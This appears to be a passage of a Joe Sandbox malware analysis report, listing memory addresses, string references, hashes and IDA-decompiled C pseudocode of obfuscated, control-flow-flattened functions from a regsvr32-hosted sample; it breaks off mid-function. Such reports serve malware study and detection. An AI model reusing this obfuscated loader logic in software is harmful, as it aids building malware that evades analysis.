0x04b863fd
0x04b8640e
0x04b86411
0x04b86416
0x04b86418
0x00000000
0x04b86346
0x04b8634c
0x04b863c5
0x04b863cc
0x00000000
0x04b8634e
0x04b86350
0x00000000
0x04b86356
0x04b86388
0x04b8638f
0x04b863a0
0x04b863a3
0x04b863a3
0x00000000
0x04b863a3
0x04b86350
0x04b8634c
0x04b86340
0x04b86338
0x04b86330
0x00000000
0x04b866d0
0x04b866d0
0x04b866d0
0x00000000
0x04b866dc
0x04b86317

Strings

P_W, xrefs: 04B85D6B
W"j, xrefs: 04B86006
2G, xrefs: 04B85905
tJP, xrefs: 04B85E3C
{4, xrefs: 04B85CFA
(INK, xrefs: 04B85DE6
NI5, xrefs: 04B85FC8
5 , xrefs: 04B85D12
Jm, xrefs: 04B85EFF
W, xrefs: 04B85BC0
`, xrefs: 04B8621F

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
API String ID: 0-4122124823
Opcode ID: 4a61c4aa0bb4bc9402a102fc0b4c7354728e2345cd1d03835c198879df1ecbbf
Instruction ID: 6d47f97133ea5c8696228da3eac7973c403bdedb4e80d52ffe38a9debe64c076
Opcode Fuzzy Hash: 4a61c4aa0bb4bc9402a102fc0b4c7354728e2345cd1d03835c198879df1ecbbf
Instruction Fuzzy Hash: B972FD715093818FD7B9CF65C58AB8FBBE1BBC4308F108A1DE2D986260D7B19959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B8D14C, Relevance: 14.1, Strings: 11, Instructions: 385
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04B8D14C() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t429;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				void* _t441;
				void* _t459;
				signed int _t468;
				intOrPtr _t469;
				intOrPtr* _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int* _t477;
				void* _t480;

				_t477 =  &_v1756;
				_v1600 = 0x9247ff;
				_t441 = 0xcb67425;
				_v1600 = _v1600 + 0x9ce;
				_v1600 = _v1600 ^ 0x009251e4;
				_v1720 = 0x31cc78;
				_v1720 = _v1720 ^ 0xe44f8b4e;
				_v1720 = _v1720 | 0xfbe7febf;
				_v1720 = _v1720 ^ 0xfff0ff80;
				_v1612 = 0x6730db;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0xcc36c002;
				_v1668 = 0x7fe6a4;
				_v1668 = _v1668 + 0xffff1494;
				_v1668 = _v1668 ^ 0x091c946b;
				_v1668 = _v1668 ^ 0x09626f51;
				_v1756 = 0x73e886;
				_v1756 = _v1756 | 0xafbdbbdf;
				_v1756 = _v1756 + 0xfe30;
				_v1756 = _v1756 ^ 0xb000fa0f;
				_v1604 = 0x468da6;
				_v1604 = _v1604 + 0xffffc3ca;
				_v1604 = _v1604 ^ 0x00465160;
				_v1592 = 0xd4519;
				_v1592 = _v1592 + 0x934d;
				_v1592 = _v1592 ^ 0x0004ddfc;
				_v1640 = 0x8a1a75;
				_v1640 = _v1640 + 0x87da;
				_v1640 = _v1640 + 0xaa53;
				_v1640 = _v1640 ^ 0x008e8924;
				_v1648 = 0xe80c10;
				_v1648 = _v1648 ^ 0x90af551f;
				_v1648 = _v1648 + 0x6d6d;
				_v1648 = _v1648 ^ 0x90403b69;
				_v1712 = 0x809df1;
				_v1712 = _v1712 << 2;
				_v1712 = _v1712 << 7;
				_v1576 = _v1576 & 0x00000000;
				_v1712 = _v1712 * 0x69;
				_v1712 = _v1712 ^ 0x81832f4f;
				_v1656 = 0xe952a2;
				_v1656 = _v1656 | 0x54fcc54b;
				_v1656 = _v1656 + 0xffff1739;
				_v1656 = _v1656 ^ 0x54fad21b;
				_v1700 = 0xbcdb1b;
				_v1700 = _v1700 + 0xdccd;
				_v1700 = _v1700 + 0xffffcf6f;
				_v1700 = _v1700 ^ 0x00b72c28;
				_v1628 = 0x5c7dad;
				_v1628 = _v1628 >> 5;
				_v1628 = _v1628 + 0x3d87;
				_v1628 = _v1628 ^ 0x000cf9b2;
				_v1660 = 0x2281c9;
				_v1660 = _v1660 * 0x49;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x004fb411;
				_v1568 = 0xcd133d;
				_v1568 = _v1568 * 0x4e;
				_v1568 = _v1568 ^ 0x3e7dd872;
				_v1672 = 0x86c6ca;
				_v1672 = _v1672 * 0x5f;
				_v1672 = _v1672 + 0xffff3952;
				_v1672 = _v1672 ^ 0x3200c70e;
				_v1588 = 0x24e2cc;
				_v1588 = _v1588 | 0xcf150453;
				_v1588 = _v1588 ^ 0xcf3ce5d0;
				_v1572 = 0x6249a8;
				_v1572 = _v1572 << 6;
				_v1572 = _v1572 ^ 0x189f8b0c;
				_v1596 = 0x119a44;
				_v1596 = _v1596 >> 8;
				_v1596 = _v1596 ^ 0x000b5fad;
				_v1680 = 0xd16cc2;
				_v1680 = _v1680 ^ 0x4916a611;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 ^ 0x00055714;
				_v1728 = 0x441d3d;
				_t471 = 0x35;
				_v1728 = _v1728 * 3;
				_v1728 = _v1728 << 3;
				_v1728 = _v1728 | 0x559f2c94;
				_v1728 = _v1728 ^ 0x57fdad3a;
				_v1564 = 0xb1e813;
				_v1564 = _v1564 >> 0xc;
				_v1564 = _v1564 ^ 0x0004104c;
				_v1736 = 0x70197f;
				_v1736 = _v1736 >> 0x10;
				_v1736 = _v1736 + 0xe51d;
				_v1736 = _v1736 * 0x61;
				_v1736 = _v1736 ^ 0x00557f63;
				_v1744 = 0x5ff0e3;
				_v1744 = _v1744 + 0xffff2d97;
				_v1744 = _v1744 + 0xffff9c65;
				_v1744 = _v1744 ^ 0xd07f01de;
				_v1744 = _v1744 ^ 0xd026cc62;
				_v1608 = 0x914f5e;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0xa7adba7a;
				_v1664 = 0xe3376f;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 ^ 0x000bcae6;
				_v1616 = 0x54b2fb;
				_v1616 = _v1616 + 0xce1d;
				_v1616 = _v1616 ^ 0x005b3b7b;
				_v1644 = 0xe2ce3f;
				_v1644 = _v1644 + 0x16f2;
				_v1644 = _v1644 >> 0xd;
				_v1644 = _v1644 ^ 0x000e1e70;
				_v1752 = 0x7f4aca;
				_v1752 = _v1752 ^ 0x883f1d9d;
				_v1752 = _v1752 + 0x59a5;
				_v1752 = _v1752 | 0x80ddc91b;
				_v1752 = _v1752 ^ 0x88d3833c;
				_v1636 = 0xc2c2cf;
				_v1636 = _v1636 / _t471;
				_v1636 = _v1636 + 0xffff5d17;
				_v1636 = _v1636 ^ 0x0005a2c5;
				_v1676 = 0x4604e2;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 + 0xdac5;
				_v1676 = _v1676 ^ 0x2048b942;
				_v1652 = 0x890d36;
				_v1652 = _v1652 >> 3;
				_v1652 = _v1652 | 0xfe9d52c1;
				_v1652 = _v1652 ^ 0xfe9ab4fb;
				_v1684 = 0xd96cde;
				_v1684 = _v1684 * 0x47;
				_v1684 = _v1684 + 0xffff480a;
				_v1684 = _v1684 ^ 0x3c48c040;
				_v1624 = 0xc48732;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x01665cbd;
				_v1624 = _v1624 ^ 0x016df620;
				_v1692 = 0x58f5b8;
				_v1692 = _v1692 << 4;
				_v1692 = _v1692 ^ 0x299232ca;
				_v1692 = _v1692 ^ 0x2c1b7361;
				_v1732 = 0x9987b4;
				_v1732 = _v1732 << 4;
				_v1732 = _v1732 ^ 0x14505727;
				_v1732 = _v1732 | 0xbadb6758;
				_v1732 = _v1732 ^ 0xbfd57076;
				_v1708 = 0x151e5;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 + 0xffff12c7;
				_v1708 = _v1708 ^ 0xffff0a0d;
				_v1580 = 0x15a9fb;
				_v1580 = _v1580 >> 6;
				_v1580 = _v1580 ^ 0x0004a695;
				_v1688 = 0x871746;
				_t472 = 0x34;
				_v1688 = _v1688 / _t472;
				_v1688 = _v1688 + 0xffff07ae;
				_v1688 = _v1688 ^ 0x00087c5e;
				_v1740 = 0xe3d16b;
				_v1740 = _v1740 << 7;
				_v1740 = _v1740 | 0x6cb9ee1d;
				_v1740 = _v1740 ^ 0x38143ac0;
				_v1740 = _v1740 ^ 0x45e6e926;
				_v1724 = 0xe03c47;
				_v1724 = _v1724 + 0x7497;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 + 0xffff69be;
				_v1724 = _v1724 ^ 0x2c306d9d;
				_v1748 = 0xe2efab;
				_v1748 = _v1748 | 0x110de103;
				_v1748 = _v1748 + 0x3577;
				_t473 = 0x2b;
				_t440 = _v1576;
				_v1748 = _v1748 / _t473;
				_v1748 = _v1748 ^ 0x006272f3;
				_v1716 = 0x295420;
				_v1716 = _v1716 ^ 0xaa3d2c48;
				_v1716 = _v1716 + 0xffff3248;
				_v1716 = _v1716 ^ 0xb95b2034;
				_v1716 = _v1716 ^ 0x134f16e6;
				_v1620 = 0x315b6e;
				_v1620 = _v1620 ^ 0xed866512;
				_v1620 = _v1620 ^ 0xedb02c8f;
				_v1696 = 0xb25998;
				_t476 = _v1576;
				_t468 = _v1576;
				_v1696 = _v1696 * 0xf;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 ^ 0xe675be87;
				_v1632 = 0x9ab851;
				_v1632 = _v1632 ^ 0x37be7fac;
				_v1632 = _v1632 + 0xffff726f;
				_v1632 = _v1632 ^ 0x372cadd5;
				_v1704 = 0xe98d3;
				_v1704 = _v1704 | 0xb808fc66;
				_v1704 = _v1704 ^ 0xb98541de;
				_v1704 = _v1704 | 0x92c26071;
				_v1704 = _v1704 ^ 0x93ce4092;
				_v1584 = 0x695255;
				_v1584 = _v1584 | 0x2c3ea780;
				_v1584 = _v1584 ^ 0x2c75cea7;
				while(1) {
					L1:
					while(1) {
						_t459 = 0x5c;
						do {
							while(1) {
								L3:
								_t480 = _t441 - 0xc1f8872;
								if(_t480 > 0) {
									break;
								}
								if(_t480 == 0) {
									E04B83046(_v1696, _v1632, _v1704, _t440, _v1584);
								} else {
									if(_t441 == 0x1770085) {
										_t476 = E04B97C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
										_t477 =  &(_t477[0x16]);
										__eflags = _t476;
										if(_t476 == 0) {
											goto L10;
										} else {
											_t441 = 0x650cb13;
											_v1576 = 1;
											while(1) {
												_t459 = 0x5c;
												goto L3;
											}
										}
									} else {
										if(_t441 == 0x30ba806) {
											_t469 =  *0x4ba6214; // 0x0
											_t470 = _t469 + 0x23c;
											while(1) {
												__eflags =  *_t470 - _t459;
												if( *_t470 == _t459) {
													break;
												}
												_t470 = _t470 + 2;
												__eflags = _t470;
											}
											_t468 = _t470 + 2;
											_t441 = 0xd1695f5;
											continue;
										} else {
											if(_t441 == 0x650cb13) {
												E04B9B257(_t440, _v1688, _v1740, _t476);
												_t441 = 0x8b9ab05;
												while(1) {
													_t459 = 0x5c;
													goto L3;
												}
											} else {
												if(_t441 != 0x8b9ab05) {
													goto L25;
												} else {
													_t352 =  &_v1748; // 0x45e6e926
													E04B83046(_v1724,  *_t352, _v1716, _t476, _v1620);
													_t477 =  &(_t477[3]);
													L10:
													_t441 = 0xc1f8872;
													while(1) {
														_t459 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1576;
							}
							__eflags = _t441 - 0xcb67425;
							if(_t441 == 0xcb67425) {
								E04B81A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
								_t477 =  &(_t477[8]);
								_t441 = 0xd521465;
								_t459 = 0x5c;
								goto L25;
							} else {
								__eflags = _t441 - 0xd1695f5;
								if(_t441 == 0xd1695f5) {
									_t440 = E04B9E8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
									_t477 =  &(_t477[4]);
									__eflags = _t440;
									if(_t440 != 0) {
										_t441 = 0x1770085;
										_t459 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t441 - 0xd521465;
									if(__eflags != 0) {
										goto L25;
									} else {
										_push(_v1568);
										_push(_v1660);
										_push(_v1628);
										_t429 = E04B9E1F8(0x4b81030, _v1700, __eflags);
										E04B87078( &_v1040, __eflags);
										_t432 =  *0x4ba6214; // 0x0
										_t436 =  *0x4ba6214; // 0x0
										E04B8F96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
										E04B9FECB(_t429, _v1728, _v1564, _v1736, _v1744);
										_t477 =  &(_t477[0x10]);
										_t441 = 0x30ba806;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t441 - 0x3fe9fd3;
						} while (_t441 != 0x3fe9fd3);
						goto L28;
					}
				}
			}

0x04b8d14c
0x04b8d156
0x04b8d161
0x04b8d166
0x04b8d171
0x04b8d17c
0x04b8d184
0x04b8d18c
0x04b8d194
0x04b8d19c
0x04b8d1a7
0x04b8d1af
0x04b8d1ba
0x04b8d1c2
0x04b8d1ca
0x04b8d1d2
0x04b8d1da
0x04b8d1e2
0x04b8d1ea
0x04b8d1f2
0x04b8d1fa
0x04b8d205
0x04b8d210
0x04b8d21b
0x04b8d226
0x04b8d231
0x04b8d23c
0x04b8d247
0x04b8d252
0x04b8d25d
0x04b8d268
0x04b8d270
0x04b8d278
0x04b8d280
0x04b8d288
0x04b8d290
0x04b8d295
0x04b8d29f
0x04b8d2a7
0x04b8d2ab
0x04b8d2b3
0x04b8d2bb
0x04b8d2c3
0x04b8d2cb
0x04b8d2d3
0x04b8d2db
0x04b8d2e3
0x04b8d2eb
0x04b8d2f3
0x04b8d2fe
0x04b8d306
0x04b8d311
0x04b8d31c
0x04b8d329
0x04b8d32d
0x04b8d332
0x04b8d33a
0x04b8d34d
0x04b8d354
0x04b8d35f
0x04b8d36c
0x04b8d370
0x04b8d378
0x04b8d380
0x04b8d38b
0x04b8d396
0x04b8d3a1
0x04b8d3ac
0x04b8d3b4
0x04b8d3bf
0x04b8d3ca
0x04b8d3d2
0x04b8d3dd
0x04b8d3e5
0x04b8d3ed
0x04b8d3f4
0x04b8d3fc
0x04b8d40b
0x04b8d40c
0x04b8d410
0x04b8d415
0x04b8d41d
0x04b8d425
0x04b8d430
0x04b8d438
0x04b8d443
0x04b8d44b
0x04b8d450
0x04b8d45d
0x04b8d461
0x04b8d469
0x04b8d471
0x04b8d479
0x04b8d481
0x04b8d489
0x04b8d491
0x04b8d49c
0x04b8d4a4
0x04b8d4af
0x04b8d4b7
0x04b8d4bc
0x04b8d4c1
0x04b8d4c9
0x04b8d4d4
0x04b8d4df
0x04b8d4ea
0x04b8d4f5
0x04b8d500
0x04b8d508
0x04b8d513
0x04b8d51b
0x04b8d523
0x04b8d52b
0x04b8d533
0x04b8d53b
0x04b8d54f
0x04b8d556
0x04b8d561
0x04b8d56c
0x04b8d579
0x04b8d57d
0x04b8d585
0x04b8d58d
0x04b8d595
0x04b8d59a
0x04b8d5a2
0x04b8d5aa
0x04b8d5b7
0x04b8d5bb
0x04b8d5c3
0x04b8d5cb
0x04b8d5d6
0x04b8d5de
0x04b8d5e9
0x04b8d5f4
0x04b8d5fc
0x04b8d601
0x04b8d609
0x04b8d611
0x04b8d619
0x04b8d61e
0x04b8d626
0x04b8d62e
0x04b8d636
0x04b8d63e
0x04b8d643
0x04b8d648
0x04b8d650
0x04b8d65a
0x04b8d665
0x04b8d66d
0x04b8d678
0x04b8d686
0x04b8d68b
0x04b8d691
0x04b8d699
0x04b8d6a1
0x04b8d6a9
0x04b8d6ae
0x04b8d6b6
0x04b8d6be
0x04b8d6c6
0x04b8d6ce
0x04b8d6d6
0x04b8d6db
0x04b8d6e3
0x04b8d6eb
0x04b8d6f3
0x04b8d6fb
0x04b8d707
0x04b8d70a
0x04b8d711
0x04b8d715
0x04b8d71d
0x04b8d725
0x04b8d72d
0x04b8d735
0x04b8d73d
0x04b8d745
0x04b8d750
0x04b8d75b
0x04b8d766
0x04b8d773
0x04b8d77a
0x04b8d781
0x04b8d785
0x04b8d78a
0x04b8d792
0x04b8d79d
0x04b8d7a8
0x04b8d7b3
0x04b8d7be
0x04b8d7c6
0x04b8d7ce
0x04b8d7d6
0x04b8d7de
0x04b8d7e6
0x04b8d7f1
0x04b8d7fc
0x04b8d807
0x04b8d807
0x04b8d80c
0x04b8d80e
0x04b8d80f
0x04b8d80f
0x04b8d80f
0x04b8d80f
0x04b8d811
0x00000000
0x00000000
0x04b8d817
0x04b8da90
0x04b8d81d
0x04b8d823
0x04b8d90c
0x04b8d90e
0x04b8d911
0x04b8d913
0x00000000
0x04b8d919
0x04b8d919
0x04b8d91e
0x04b8d80c
0x04b8d80e
0x00000000
0x04b8d80e
0x04b8d80c
0x04b8d825
0x04b8d82b
0x04b8d87a
0x04b8d880
0x04b8d88b
0x04b8d88b
0x04b8d88e
0x00000000
0x00000000
0x04b8d888
0x04b8d888
0x04b8d888
0x04b8d890
0x04b8d893
0x00000000
0x04b8d82d
0x04b8d833
0x04b8d86c
0x04b8d873
0x04b8d80c
0x04b8d80e
0x00000000
0x04b8d80e
0x04b8d835
0x04b8d83b
0x00000000
0x04b8d841
0x04b8d84d
0x04b8d855
0x04b8d85a
0x04b8d85d
0x04b8d85d
0x04b8d80c
0x04b8d80e
0x00000000
0x04b8d80e
0x04b8d80c
0x04b8d83b
0x04b8d833
0x04b8d82b
0x04b8d823
0x04b8da98
0x04b8daa9
0x04b8daa9
0x04b8d92e
0x04b8d934
0x04b8da5b
0x04b8da60
0x04b8da63
0x04b8da6a
0x00000000
0x04b8d93a
0x04b8d93a
0x04b8d940
0x04b8da1a
0x04b8da1c
0x04b8da1f
0x04b8da21
0x04b8da23
0x04b8d80e
0x00000000
0x04b8d80e
0x04b8d946
0x04b8d946
0x04b8d94c
0x00000000
0x04b8d952
0x04b8d952
0x04b8d95e
0x04b8d962
0x04b8d96d
0x04b8d97b
0x04b8d99f
0x04b8d9c8
0x04b8d9d2
0x04b8d9ec
0x04b8d9f1
0x04b8d9f4
0x00000000
0x04b8d9f4
0x04b8d94c
0x04b8d940
0x00000000
0x04b8da6b
0x04b8da6b
0x04b8da6b
0x00000000
0x04b8da77
0x04b8d80c

Strings

&E, xrefs: 04B8D84D
`QF, xrefs: 04B8D210
{;[, xrefs: 04B8D4DF
T), xrefs: 04B8D71D
w5, xrefs: 04B8D6FB
o7, xrefs: 04B8D4AF
Qob, xrefs: 04B8D1D2
n[1, xrefs: 04B8D745
G<, xrefs: 04B8D6C6
mm, xrefs: 04B8D278
URi, xrefs: 04B8D7E6

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
API String ID: 0-1763375246
Opcode ID: 9175f076ca028ddcf32141ca898223a311c1faeee63d6ab98614b88cf5b0c8f0
Instruction ID: 49428e2ad061d96da694e88f1318237ac8a1459b4c62872a1a8c30b4fe7e4740
Opcode Fuzzy Hash: 9175f076ca028ddcf32141ca898223a311c1faeee63d6ab98614b88cf5b0c8f0
Instruction Fuzzy Hash: 472211714093809FD3B8CF61C94AA9BBBE1FBC1708F10891DE2DA96260D7B58949CF13

Uniqueness

Uniqueness Score: -1.00%

Function 04B95779, Relevance: 12.9, Strings: 10, Instructions: 430
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04B95779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
